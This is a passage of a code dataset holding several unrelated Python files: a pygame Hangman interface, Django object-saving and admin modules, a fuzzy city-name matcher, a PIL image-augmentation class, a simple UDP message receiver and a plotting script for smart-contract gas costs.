screen.blit(img, location)\n else:\n img = FONT_70.render(text[:30], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -100)\n screen.blit(img, location)\n\n img = FONT_70.render(text[30:], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -30)\n screen.blit(img, location)\n\n back = pygame.Rect(0, 0, 300, 130)\n back.center = (640, 550)\n front = pygame.Rect(0, 0, 290, 120)\n front.center = (640, 550)\n\n pygame.draw.rect(screen, LIGHT_BLACK, back)\n pygame.draw.rect(screen, BG_COLOUR, front)\n ToMenu = FONT_100.render(\"To Menu\", True, LIGHT_BLACK)\n TMlocation = ToMenu.get_rect(center=screen.get_rect().center)\n TMlocation.move_ip(0, 190)\n screen.blit(ToMenu, TMlocation)\n\n if back.collidepoint((mx, my)):\n pygame.draw.rect(screen, LIGHT_BLACK, front)\n ToMenu = FONT_100.render(\"To Menu\", True, WHITE)\n TMlocation = ToMenu.get_rect(center=screen.get_rect().center)\n TMlocation.move_ip(0, 190)\n screen.blit(ToMenu, TMlocation)\n\n\n\n image = pygame.image.load('assets/10.png')\n screen.blit(image, (900,350))\n \n img = FONT_60.render(\"R.I.P.\", True, RED)\n screen.blit(img, (1030, 665))\n\n pygame.display.update()\n\n\n\ndef win_screen(game_obj):\n running = True\n while running:\n mx, my = pygame.mouse.get_pos()\n\n\n screen.fill(BG_COLOUR)\n\n img = FONT_180.render(\"You Won!\", True, GREEN)\n screen.blit(img, (350, 50))\n\n img = FONT_70.render(\"Well done for guessing:\", True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -150)\n screen.blit(img, location)\n\n text = game_obj.string\n if len(text) <= 30:\n img = FONT_70.render(text, True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -80)\n screen.blit(img, location)\n\n elif len(text) > 30 and len(text) <= 60:\n if text[30] != \" \" and text[29] != \" \":\n img = 
FONT_70.render(text[:30] + '-', True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -80)\n screen.blit(img, location)\n\n img = FONT_70.render(text[30:], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -30)\n screen.blit(img, location)\n else:\n img = FONT_70.render(text[:30], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -80)\n screen.blit(img, location)\n\n img = FONT_70.render(text[30:], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -30)\n screen.blit(img, location)\n\n\n back = pygame.Rect(0, 0, 300, 130)\n back.center = (640, 550)\n front = pygame.Rect(0, 0, 290, 120)\n front.center = (640, 550)\n\n pygame.draw.rect(screen, LIGHT_BLACK, back)\n pygame.draw.rect(screen, BG_COLOUR, front)\n ToMenu = FONT_100.render(\"To Menu\", True, LIGHT_BLACK)\n TMlocation = ToMenu.get_rect(center=screen.get_rect().center)\n TMlocation.move_ip(0, 190)\n screen.blit(ToMenu, TMlocation)\n\n if back.collidepoint((mx,my)):\n pygame.draw.rect(screen, LIGHT_BLACK, front)\n ToMenu = FONT_100.render(\"To Menu\", True, WHITE)\n TMlocation = ToMenu.get_rect(center = screen.get_rect().center)\n TMlocation.move_ip(0,190)\n screen.blit(ToMenu, TMlocation)\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if back.collidepoint((mx, my)):\n running = False\n main_menu()\n pygame.display.update()\n\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n running = False\n screen.fill(BG_COLOUR)\n\n pygame.display.update()\n\n\ndef add_dict():\n root = Tk()\n # PhotoImage cannot load .ico files, so set the window icon via wm_iconbitmap only\n root.wm_iconbitmap(bitmap = \"assets/Hangman.ico\")\n root.title(\"Add dictionary\")\n\n l1 = Label(root, text= \"Input a vocabulary.com/lists URL\")\n l1.pack()\n\n e1 = Entry(root)\n e1.pack()\n e1.insert(0, 'Example: www.vocabulary.com/lists/111111')\n e1.configure(state=DISABLED)\n def on_click(event):\n e1.configure(state=NORMAL)\n e1.delete(0, END)\n\n e1.unbind('<Button-1>', on_click_id)\n\n # NOTE: the Tk event name in this record was stripped during extraction (the angle\n # brackets read as an HTML tag); '<Button-1>' is a best-guess reconstruction to match on_click\n on_click_id = e1.bind('<Button-1>', on_click)\n\n def save(url):\n if web.pull(url):\n root.destroy()\n b1 = Button(root, text =\"Save\", command=lambda: save(e1.get()))\n b1.pack()\n root.mainloop()\n\n\ndef main_menu():\n running = True\n while running:\n mx, my = pygame.mouse.get_pos()\n\n screen.fill(BG_COLOUR)\n\n gitlink = FONT_30.render(\"Made By: github.com/AlexDavicenko\", True, LIGHT_BLACK)\n gitlinkRect = gitlink.get_rect()\n gitlinkRect.move_ip(10, 690)\n screen.blit(gitlink, (10, 690))\n\n title = FONT_200.render('HANGMAN', True, ORANGE_RED)\n titleRect = title.get_rect()\n titleRect.move_ip(250, 20)\n if titleRect.collidepoint((mx,my)):\n title = FONT_200.render('HANGMAN', True, RED)\n screen.blit(title, (250, 20))\n\n optionSP = pygame.Rect(0,0,320,150)\n optionMP = pygame.Rect(0,0,320,150)\n optionAD = pygame.Rect(0,0,320,150)\n\n optionSPw = pygame.Rect(0,0,310,140)\n optionMPw = pygame.Rect(0,0,310,140)\n optionADw = pygame.Rect(0,0,310,140)\n\n optionSP.center = (640,240)\n optionMP.center = (640,420)\n optionAD.center = (640,600)\n optionSPw.center = (640,240)\n optionMPw.center = (640,420)\n optionADw.center = (640,600)\n\n pygame.draw.rect(screen, LIGHT_BLACK, optionSP)\n pygame.draw.rect(screen, LIGHT_BLACK, optionMP)\n 
pygame.draw.rect(screen, LIGHT_BLACK, optionAD)\n pygame.draw.rect(screen, BG_COLOUR, optionSPw)\n pygame.draw.rect(screen, BG_COLOUR, optionMPw)\n pygame.draw.rect(screen, BG_COLOUR, optionADw)\n\n\n\n\n\n SPcaption = FONT_60.render(\"Singleplayer\", True, LIGHT_BLACK)\n SPlocation = SPcaption.get_rect(center = screen.get_rect().center)\n SPlocation.move_ip(0,-120)\n screen.blit(SPcaption, SPlocation)\n\n MPcaption = FONT_60.render(\"Multiplayer\", True, LIGHT_BLACK)\n MPlocation = MPcaption.get_rect(center = screen.get_rect().center)\n MPlocation.move_ip(0,60)\n screen.blit(MPcaption, MPlocation)\n\n ADcaption = FONT_60.render(\"Add Dictionary\", True, LIGHT_BLACK)\n ADlocation = ADcaption.get_rect(center=screen.get_rect().center)\n ADlocation.move_ip(0, 240)\n screen.blit(ADcaption, ADlocation)\n\n\n if optionSP.collidepoint((mx,my)):\n pygame.draw.rect(screen, LIGHT_BLACK, optionSPw)\n SPcaption = FONT_60.render(\"Singleplayer\", True, WHITE)\n SPlocation = SPcaption.get_rect(center = screen.get_rect().center)\n SPlocation.move_ip(0,-120)\n screen.blit(SPcaption, SPlocation)\n \n\n\n if optionMP.collidepoint((mx,my)):\n pygame.draw.rect(screen, LIGHT_BLACK, optionMPw)\n MPcaption = FONT_60.render(\"Multiplayer\", True, WHITE)\n MPlocation = MPcaption.get_rect(center = screen.get_rect().center)\n MPlocation.move_ip(0,60)\n screen.blit(MPcaption, MPlocation)\n\n if optionAD.collidepoint((mx,my)):\n pygame.draw.rect(screen, LIGHT_BLACK, optionADw)\n ADcaption = FONT_60.render(\"Add Dictionary\", True, WHITE)\n ADlocation = ADcaption.get_rect(center = screen.get_rect().center)\n ADlocation.move_ip(0,240)\n screen.blit(ADcaption, ADlocation)\n\n\n\n \n\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if optionSP.collidepoint((mx, my)):\n dictSelect()\n if optionMP.collidepoint((mx, my)):\n word_enter()\n if optionAD.collidepoint((mx, my)):\n add_dict()\n if gitlinkRect.collidepoint((mx, my)):\n webbrowser.open('http://github.com/AlexDavicenko')\n\n pygame.display.update()\nmain_menu()","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":18467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"291300801","text":"import datetime\nimport os\n\nfrom django.utils import timezone\nfrom tagging.utils import parse_tag_input\nfrom tzlocal import get_localzone\n\nfrom obj_sys import obj_tools\nfrom obj_sys.models_ufs_obj import UfsObj\nfrom tagging.models import Tag\n\n\nclass ObjectIsNotAssigned(Exception):\n pass\n\n\nclass UfsObjSaverBase(object):\n def __init__(self, user):\n super(UfsObjSaverBase, self).__init__()\n self.user = user\n self.source = UfsObj.SOURCE_WEB_POST\n self.last_modified = None\n self.parent = None\n self.create_param = None\n self.obj = None\n self.ufs_url = None\n self.full_path = None\n self.tag_app = None\n\n def filter_or_create(self):\n obj_filter = self.get_filter()\n if not obj_filter.exists():\n self.obj, is_created = self.get_or_create()\n else:\n self.obj = obj_filter[0]\n return obj_filter\n\n def get_or_create(self):\n obj_filter = self.get_filter()\n if obj_filter.exists():\n self.obj = obj_filter[0]\n return self.obj, False\n self.create_param = ({\"ufs_url\": self.ufs_url, \"parent\": self.parent, \"user\": self.user,\n \"full_path\": self.full_path, \"ufs_obj_type\": self.ufs_obj_type,\n \"source\": self.source})\n if not (self.last_modified is None):\n 
self.create_param[\"last_modified\"] = self.last_modified\n self.obj, is_created = UfsObj.objects.get_or_create(**self.create_param)\n return self.obj, is_created\n\n def append_tags(self, tags):\n if self.obj is None:\n raise ObjectIsNotAssigned\n for tag_name in parse_tag_input(tags):\n Tag.objects.add_tag(self.obj, tag_name, tag_app=self.tag_app)\n\n def add_description(self, description):\n self.obj.descriptions.add(description)\n # self.obj.save()\n\n\nclass UfsLocalObjSaver(UfsObjSaverBase):\n def __init__(self, user, ufs_obj_type=UfsObj.TYPE_UFS_OBJ):\n super(UfsLocalObjSaver, self).__init__(user)\n self.ufs_obj_type = ufs_obj_type\n\n def init_with_qt_url(self, qt_file_url):\n self.init_with_full_path(obj_tools.get_full_path_for_local_os(qt_file_url))\n\n def init_with_full_path(self, full_path):\n self.full_path = full_path\n self.ufs_url = obj_tools.get_ufs_url_for_local_path(self.full_path)\n tz = get_localzone()\n self.last_modified = tz.localize(datetime.datetime.fromtimestamp(os.path.getmtime(self.full_path)))\n\n def get_filter(self):\n return UfsObj.objects.filter(full_path=self.full_path, user=self.user)\n\n def get_or_create(self):\n obj, is_created = super(UfsLocalObjSaver, self).get_or_create()\n if os.path.isdir(self.full_path):\n self.__append_folder_tag()\n return obj, is_created\n\n def __append_folder_tag(self):\n self.append_tags(\"folder\")\n\n def update_from_local_path(self):\n self.get_filter().update(last_modified=self.last_modified)\n\n @staticmethod\n def get_full_path_from_qt_url(url):\n return url.replace(\"file:///\", \"\")\n\n @staticmethod\n def get_qt_url_from_full_path(full_path):\n return \"file:///%s\" % full_path\n\n\nclass UfsUrlObj(UfsObjSaverBase):\n def __init__(self, web_url, user, ufs_obj_type=UfsObj.TYPE_UFS_OBJ):\n super(UfsUrlObj, self).__init__(user)\n self.full_path = None\n self.ufs_url = web_url\n self.ufs_obj_type = ufs_obj_type\n\n def get_filter(self):\n return UfsObj.objects.filter(ufs_url=self.ufs_url, user=self.user)\n","sub_path":"obj_sys/ufs_local_obj.py","file_name":"ufs_local_obj.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"600615824","text":"\r\n\"\"\"\r\nCreated on Sun Aug 25 21:02:56 2019\r\n\r\n@author: Robin Devasagayam Sebastian\r\n\"\"\"\r\n\r\n\r\nfrom fuzzywuzzy import process\r\n\r\nwith open(\"D:/Data/Projects/Fuzzy String Matching/cities.csv\", \"r\") as f:\r\n cities=f.read().split(\"\\n\") \r\n\r\ndef get_matches(query, choice, limit=3):\r\n result=process.extract(query, choice, limit=limit)\r\n return result\r\n\r\nprint(\"Please enter any city name\")\r\nn= (str(input()))\r\n\r\nprint(\"The matches of the names of the cities are: \", get_matches(n, cities))\r\n","sub_path":"fuzzystring.py","file_name":"fuzzystring.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"15606068","text":"\"\"\"\nImplements PILImage,\nwhich subclasses PIL.Image with some extra useful methods\n\"\"\"\n\nimport random\nfrom typing import Optional, Tuple, Dict, List\n\nimport numpy as np\nfrom PIL import Image, ImageFilter\n\n_PERMUTATIONS: Dict[str, Optional[int]] = {\n 'flip_left_right': Image.FLIP_LEFT_RIGHT,\n 'flip_top_bottom': Image.FLIP_TOP_BOTTOM,\n 'rotate_90': Image.ROTATE_90,\n 'rotate_180': Image.ROTATE_180,\n 'rotate_270': Image.ROTATE_270,\n 'transpose': Image.TRANSPOSE,\n 'transverse': Image.TRANSVERSE,\n 'noop': 
None,\n}\n\n\nclass PILImageError(Exception):\n \"\"\"Error when modifying a PIL image\"\"\"\n\n\nclass PILImage(Image.Image):\n \"\"\"Modifications onto PIL's Image class\n\n self is implicitly the PILImage object\n\n Assumes color images in uint8 scale [0, 255]\n \"\"\"\n\n # Manually config this based on the project\n _SUPPORTED_PERMUTATIONS: List[str] = \\\n list(_PERMUTATIONS.keys())\n\n def __init__(self, img: Optional[Image.Image] = None):\n \"\"\"Initializes a PILImage object with a PIL.Image.Image object, if provided\"\"\"\n super().__init__()\n if img is not None:\n # this is digging into the original code, but these\n # are all the fields of the PIL image class\n # TODO: Find an easier way than hard-coding the attributes\n self.im = img.im\n self.mode = img.mode\n self.size = img.size\n self.palette = img.palette\n self.info = img.info\n self.category = img.category\n self.readonly = img.readonly\n self.pyaccess = img.pyaccess\n\n \"\"\"Handles important initialization methods\"\"\"\n\n @staticmethod\n def from_numpy_array(np_image: np.ndarray) -> 'PILImage':\n \"\"\"Generates a PIL image from an NP array\n\n NP array is assume to be in [0,1] range, np.float32 dtype\n\n :param np_image: np.array representing the image\n :returns: A PILImage object.\n\n .. versionadded:: 1.1.6\n \"\"\"\n return PILImage(\n img=Image.fromarray(\n obj=(np_image*255).astype(np.uint8),\n mode='RGB'\n )\n )\n\n @staticmethod\n def open(fp, mode=\"r\") -> 'PILImage':\n \"\"\"Implements PIL.Image.open, but returns a PILImage instead\n\n Loads in the image to make the operation not lazy\n\n :param fp: A filename (string), pathlib.Path object or a file object.\n The file object must implement :py:meth:`~file.read`,\n :py:meth:`~file.seek`, and :py:meth:`~file.tell` methods,\n and be opened in binary mode.\n :param mode: The mode. 
If given, this argument must be \"r\".\n :returns: An :py:class:`~PIL.Image.Image` object.\n :exception IOError: If the file cannot be found, or the image cannot be\n opened and identified.\n \"\"\"\n img = Image.open(fp=fp, mode=mode)\n img.load()\n return PILImage(img=img)\n\n def convert_to_rgb(self) -> 'PILImage':\n \"\"\"Converts image to rgb if needed\n\n :return: RGB PILImage\n \"\"\"\n if self.mode != 'RGB':\n return PILImage(self.convert(mode='RGB'))\n return self\n\n def permute(self, method: Optional[int]) -> 'PILImage':\n \"\"\"Applies a permutation to an image via Image.transpose\n\n :param method: Enum specifying operation (see _PERMUTATIONS)\n :return: Permuted image\n \"\"\"\n return self if method is None else PILImage(self.transpose(method))\n\n def get_random_permutation_method(self) -> Optional[int]:\n \"\"\"Gets a random permutation method\"\"\"\n return _PERMUTATIONS.get(random.choice(self._SUPPORTED_PERMUTATIONS))\n\n def random_permute(self) -> 'PILImage':\n \"\"\"Randomly permute an image\n\n :return: permuted image\n \"\"\"\n return self.permute(self.get_random_permutation_method())\n\n def derez(self,\n factor: float = 2.,\n output_size: Optional[Tuple[int, int]] = None) -> 'PILImage':\n \"\"\"Applies a deresolution to an image via downsampling and upsampling\n\n :param factor: Downsample factor\n :param output_size: Output shape of image, default is the image's original shape\n :return: Image of the same shape as input with lower quality\n \"\"\"\n if output_size is None:\n # PIL images use size\n output_size = self.size\n down_size = (\n int(output_size[0] / factor), int(output_size[1] / factor)\n )\n try:\n return PILImage(img=self.resize(down_size).resize(output_size))\n except ValueError as value_err:\n # Handles exceptions caused during the resize operations\n raise PILImageError(\n f'derez operation {self.size} -> {down_size} -> {output_size} '\n f'caused the following exception: {value_err}'\n )\n\n def blur(self) -> 'PILImage':\n \"\"\"Applies a gaussian blur to an image\n\n :return: blurred image\n \"\"\"\n return PILImage(self.filter(ImageFilter.GaussianBlur(radius=2)))\n\n def blur_derez(self,\n factor: float = 2.,\n output_size: Optional[Tuple[int, int]] = None) -> 'PILImage':\n \"\"\"Wraps a derez operation with a blur\n\n :param factor: Downsample factor\n :param output_size: Output size of each image, default is the image's original shape\n :return: Image with lower quality, blurred before and after derez\n \"\"\"\n return PILImage(img=self.blur().derez(factor=factor, output_size=output_size).blur())\n\n def crop_patch(self,\n patch_size: Tuple[int, int],\n patch_location: Tuple[int, int], ) -> 'PILImage':\n \"\"\"Crops a patch of a given size, with its top left corner at patch_location\n\n Raises an exception if the patch_location/patch_size will cause a misshapen crop\n\n This function is littered with exception possiblities, so always try to use\n random_crop_patch\n\n :param patch_size: The patch size\n :param patch_location: Tuple representing the top left corner of the patch\n :return: image of patch_size representing the crop\n \"\"\"\n # patch_size should be positive\n if not all([dim > 0 for dim in patch_size]):\n raise PILImageError(\n f'Patch size must be non-negative. '\n f'patch_size={patch_size} '\n f'{self.info}'\n )\n\n # patch_size should not be larger than the image size in any dimension\n if any([patch_size[idx] > self.size[idx] for idx in range(2)]):\n raise PILImageError(\n f'Patch size must not be larger than image size. 
'\n f'patch_size={patch_size} '\n f'image_size={self.size} '\n f'{self.info}'\n )\n # compute the corner locations of the patch\n left, upper = patch_location\n right, lower = left + patch_size[0], upper + patch_size[1]\n\n # Raise an exception if the upper left corner is not in the image\n if not (0 <= left and 0 <= upper):\n raise PILImageError(\n f'Upper left patch corner must be in the image. '\n f'upper_left_patch_corner={patch_location} '\n f'image_size={self.size} '\n f'{self.info}'\n )\n\n # raise an exception if the lower right corner is not in the image\n if not (right <= self.size[0] and lower <= self.size[1]):\n raise PILImageError(\n f'Bottom right patch corner must be in the image. '\n f'lower_right_patch_corner={(right, lower)} '\n f'image_size={self.size} '\n f'{self.info}'\n )\n\n return PILImage(self.crop(box=(left, upper, right, lower)))\n\n def random_crop_patch(self,\n patch_size: Tuple[int, int]) -> 'PILImage':\n \"\"\"Randomly crops a patch of size patch_size\n\n Randomly selects a valid patch_location argument for crop_patch\n\n Can still raise an exception if the patch_size is invalid\n :param patch_size: The patch size\n :return: image of patch_size representing the crop\n \"\"\"\n # self.size[idx]-patch_size[idx] is the maximum valid offset for a given dimension;\n # the min is 0.\n patch_location = (\n random.randint(0, self.size[0] - patch_size[0]),\n random.randint(0, self.size[1] - patch_size[1])\n )\n return self.crop_patch(patch_size=patch_size, patch_location=patch_location)\n\n def numpyize(self) -> np.ndarray:\n \"\"\"Returns a numpy array representing the image\n\n Scaled to [0,1]\n\n :return: numpy array\n \"\"\"\n return np.array(self, dtype=np.float32) / 255.\n\n @property\n def image_ops(self) -> Dict:\n \"\"\"Dictionary of all supported image operations\n\n :return: Dictionary mapping the method names to operations\n \"\"\"\n return {\n func.__name__: func for func in\n [self.blur, self.derez, self.blur_derez]\n }\n\n def apply_image_op(self, op_key: str, *args, **kwargs):\n \"\"\"Performs an image operation based on the op_key\n\n :param op_key: Operation key (see image_ops)\n :param args: arguments for method\n :param kwargs: keyword args for method\n :return: Augmented image based on image operation key, if valid\n \"\"\"\n try:\n return self.image_ops[op_key](*args, **kwargs)\n except KeyError:\n raise PILImageError(\n f'Invalid op key argument {op_key}. 
'\n f'Supported keys: {self.image_ops.keys()}'\n )\n\n def resize(self,\n size: Tuple[int, int],\n resample=Image.NEAREST,\n box=None) -> 'PILImage':\n \"\"\"Replicates Image.resize, but returns a PIL image instead\"\"\"\n return PILImage(super().resize(size, resample, box))\n","sub_path":"modules/image/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":10013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"340986494","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom django import forms\nfrom app.adminforms import TextsForm\nfrom app.models import PhotoCat, Texts, Photo\n\n__author__ = 'sidchik'\n\n\nclass PhotoCatForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(PhotoCatForm, self).__init__(*args, **kwargs)\n self.fields['parent'].queryset = PhotoCat.objects.filter(parent__isnull=True)\n\n class Meta:\n model = PhotoCat\n\n\nclass PhotoCatAdmin(admin.ModelAdmin):\n form = PhotoCatForm\n\nadmin.site.register(PhotoCat, PhotoCatAdmin)\n\n\nclass TextsAdmin(admin.ModelAdmin):\n form = TextsForm\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\nadmin.site.register(Texts, TextsAdmin)\n\n\nclass PhotoAdmin(admin.ModelAdmin):\n pass\n\nadmin.site.register(Photo, PhotoAdmin)\n\n\n","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"461389624","text":"# -*- coding:utf-8 -*-\n# @Desc: \n# @Author: Administrator\n# @DateTime: 2020-05-29 10:13\n\nimport socket\n\n\ndef main():\n\n # create the socket - udp\n udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n # use the socket to receive data\n\n # bind local info - must bind this machine's own ip and port\n udp_socket.bind((\"\", 7878))\n\n # receive data - up to the specified number of bytes\n while True:\n recv_data = udp_socket.recvfrom(1024)\n # recv_data is a tuple: (received data, (sender ip, port))\n # print(recv_data)\n\n recv_msg = recv_data[0] # store the received data\n recv_addr = recv_data[1] # store the sender's address info\n print(\"%s : %s\" %(str(recv_addr), recv_msg.decode(\"utf-8\")))\n\n # close the socket\n udp_socket.close()\n\n\nif __name__ == '__main__':\n\n main()\n\n","sub_path":"[03]Python-基础知识部分/socket-udp套接字接收数据.py","file_name":"socket-udp套接字接收数据.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"518071711","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\n\ncolumns = [\"function_name\", \"gas_cost\", \"user_id\", \"block_number\"]\n\n## ANALYSIS FOR A GROUP OF 4 MEMBERS\nfile_path = \"client/gas_cost/gas_cost_4.csv\"\ndf = pd.read_csv(file_path, names=columns)\n\n# list of functions\nfun_list = df.function_name.unique()\n\nN_fun = len(df.function_name.unique())\n\n# group_size computation\ngroup_size = len(df.user_id.unique())\ngroup = list(df.user_id.unique())\n\n# associate round to each function\ndf['round'] = 0\nfor user in group:\n for fun in fun_list:\n df.loc[(df['user_id']==user) & (df['function_name']==fun),'round'] = range(len(df[(df['user_id']==user) & (df['function_name']==fun)]))\npd.set_option('display.max_rows', None)\n\n# stats - min - mean - max init phase\ninit = df[(df['function_name']!='send_file') & (df['function_name']!='send_share')]\ninit_stats = init.groupby([\"round\", 
'function_name']).mean()\ninit_stats.rename(columns={\"gas_cost\":\"gas_cost_mean\"}, inplace=True)\ninit_stats['gas_cost_max'] = init.groupby([\"round\", 'function_name']).max()['gas_cost']\ninit_stats['gas_cost_min'] = init.groupby([\"round\", 'function_name']).min()['gas_cost']\n\n\n\n_, ax = plt.subplots(2,2)\ninit_stats.loc[0].gas_cost_max.plot(kind='bar', label=\"gas cost max\", color=\"none\",edgecolor=\"red\", ax=ax[0,0],rot=0)\ninit_stats.loc[0].gas_cost_mean.plot(kind='bar', label=\"gas cost mean\", color='#BADA55', ax=ax[0,0],rot=0)\ninit_stats.loc[0].gas_cost_min.plot(kind='bar', label=\"gas cost min\", color=\"none\", edgecolor=\"blue\", ax=ax[0,0],rot=0)\nax[0,0].set_title(\"Initialisation cost by user - first file\")\n\ninit_stats.loc[1].gas_cost_max.plot(kind='bar', label=\"gas cost max\", color=\"none\",edgecolor=\"red\", ax=ax[1,0],rot=0)\ninit_stats.loc[1].gas_cost_mean.plot(kind='bar', label=\"gas cost mean\", color='#BADA55', ax=ax[1,0],rot=0)\ninit_stats.loc[1].gas_cost_min.plot(kind='bar', label=\"gas cost min\", color=\"none\", edgecolor=\"blue\", ax=ax[1,0],rot=0)\nax[1,0].set_title(\"Initialisation cost by user - next file\")\n\n# stats encryption - decryption\nencrypt = df[(df['function_name']=='send_file') | (df['function_name']=='send_share')].drop(columns=['round'])\nencrypt_stats = encrypt.groupby('function_name').mean()\nencrypt_stats.rename(columns={\"gas_cost\":\"gas_cost_mean\"}, inplace=True)\nencrypt_stats['gas_cost_max'] = encrypt.groupby('function_name').max()['gas_cost']\nencrypt_stats['gas_cost_min'] = encrypt.groupby('function_name').min()['gas_cost']\n\nencrypt_stats.gas_cost_max.plot(kind='bar', label=\"gas cost max\", color=\"none\",edgecolor=\"red\", ax=ax[0,1],rot=0)\nencrypt_stats.gas_cost_mean.plot(kind='bar', label=\"gas cost mean\", color='#BADA55', ax=ax[0,1],rot=0)\nencrypt_stats.gas_cost_min.plot(kind='bar', label=\"gas cost min\", color=\"none\", edgecolor=\"blue\", ax=ax[0,1],rot=0)\nax[0,1].set_title(\"Encryption-decryption cost by user\")\n\n# cumulative gas stats\ndf.sort_values(by=\"block_number\", inplace=True)\n\nmapping = {\n \"group_creation\":\"initialisation\",\n \"publish_tpk\":\"initialisation\",\n \"encrypt_shares\":\"initialisation\",\n \"publish_group_key\":\"initialisation\",\n \"send_file\":\"encryption\",\n \"send_share\":\"decryption\"\n}\ndf['phase'] = df['function_name'].map(mapping)\ndf['cumul_gas_cost'] = df['gas_cost'].cumsum()\n\ndf.plot(\"block_number\", \"cumul_gas_cost\",ax=ax[1,1])\nfor r in df['round'].unique():\n min_block = df[(df['round']==r) & (df['phase']=='initialisation')]['block_number'].min()\n max_block = df[(df['round']==r) & (df['phase']=='initialisation')]['block_number'].max()\n ax[1,1].axvspan(min_block,max_block,fill=False, alpha=0.5, label=\"_\"*int(r)+\"initialisation\", hatch=\".\")\n\n min_block = df[(df['round']==r) & (df['phase']=='encryption')]['block_number'].min()\n max_block = df[(df['round']==r) & (df['phase']=='encryption')]['block_number'].max()\n ax[1,1].axvspan(min_block,max_block,color=\"black\", alpha=0.5, label=\"_\"*int(r)+\"encryption\")\n\n min_block = df[(df['round']==r) & (df['phase']=='decryption')]['block_number'].min()\n max_block = df[(df['round']==r) & (df['phase']=='decryption')]['block_number'].max()\n ax[1,1].axvspan(min_block,max_block,fill=False, alpha=0.5,label=\"_\"*int(r)+\"decryption\",hatch=\"//\")\n\nax[0,0].legend()\nax[1,0].legend()\nax[0,1].legend()\nax[1,1].legend()\n\n## ANALYSIS FOR DIFFERENT GROUP SIZES\n# create the dataframes\nfile_path_2 = 
\"client/gas_cost/gas_cost_2.csv\"\ndf_2 = pd.read_csv(file_path_2, names=columns)\nfile_path_4 = \"client/gas_cost/gas_cost_4.csv\"\ndf_4 = pd.read_csv(file_path_4, names=columns)\nfile_path_6 = \"client/gas_cost/gas_cost_6.csv\"\ndf_6 = pd.read_csv(file_path_6, names=columns)\nfile_path_10 = \"client/gas_cost/gas_cost_10.csv\"\ndf_10 = pd.read_csv(file_path_10, names=columns)\n\nlist_df = [(2,df_2),(4,df_4),(6,df_6),(10,df_10)]\n\n# associate round to each function\nfor i,df in list_df:\n group_size = len(df.user_id.unique())\n group = list(df.user_id.unique())\n\n df['round'] = 0\n for user in group:\n for fun in fun_list:\n df.loc[(df['user_id']==user) & (df['function_name']==fun),'round'] = range(len(df[(df['user_id']==user) & (df['function_name']==fun)]))\n\ndf_2['client_number'] = 2\ndf_4['client_number'] = 4\ndf_6['client_number'] = 6\ndf_10['client_number'] = 10\n\ndf = pd.concat([df_2, df_4, df_6, df_10])\ndf = df.groupby(['client_number', 'round', 'function_name']).mean().drop(columns=['block_number']).reset_index()\n# analyse round 0\nround_0 = df[df['round']==0].drop(columns='round').groupby(['client_number','function_name']).mean().unstack(level=1)['gas_cost']\nround_0.plot.bar()\nplt.title('Gas cost of transaction for the first file')\nround_0.plot(marker='o', linestyle=' ',title=\"Gas cost of transaction for the first file\")\n\nlinear_regressor = LinearRegression()\nlinear_regressor.fit(np.array(round_0.index).reshape((-1,1)), round_0['group_creation'])\nx=np.linspace(0,10,100)\ny = linear_regressor.predict(x.reshape(-1,1))\nplt.plot(x,y, label='a0={:.0f} a1={:.0f}'.format(linear_regressor.intercept_, linear_regressor.coef_[0]))\nplt.legend()\n\nlinear_regressor = LinearRegression()\nlinear_regressor.fit(np.array(round_0.index).reshape((-1,1)), round_0['encrypt_shares'])\nx=np.linspace(0,10,100)\ny = linear_regressor.predict(x.reshape(-1,1))\nplt.plot(x,y, label='a0={:.0f} a1={:.0f}'.format(linear_regressor.intercept_, linear_regressor.coef_[0]))\nplt.legend()\n\n# analyse round 1\nround_1 = df[df['round']==1].drop(columns='round').groupby(['client_number','function_name']).mean().unstack(level=1)['gas_cost']\nround_1.plot.bar()\nplt.title('Gas cost of transaction for the second file')\nround_1.plot(marker='o', linestyle=' ',title=\"Gas cost of transaction for the first file\")\n\nlinear_regressor = LinearRegression()\nlinear_regressor.fit(np.array(round_1.index).reshape((-1,1)), round_1['encrypt_shares'])\nx=np.linspace(0,10,100)\ny = linear_regressor.predict(x.reshape(-1,1))\nplt.plot(x,y, label='a0={:.0f} a1={:.0f}'.format(linear_regressor.intercept_, 